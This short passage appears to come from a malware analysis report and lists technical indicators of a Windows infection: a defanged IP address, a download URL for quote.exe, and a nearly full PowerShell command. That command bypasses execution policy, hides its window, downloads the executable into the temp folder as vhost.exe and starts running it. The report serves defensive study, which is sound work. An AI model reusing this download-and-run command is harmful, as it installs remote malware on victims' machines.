Technical Information
- http://18#.#65.29.49/quote.exe as %temp + %\vhost.exe
- '18#.#65.29.49':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -WindowStyle Hidden -noprofile -noexit (New-Object System.Net.WebClient).DownloadFile('http://18#.#65.29.49/quote.exe', $env:TEMP + '\vhost.exe'); (New-Object -com Shell...' (with hidden window)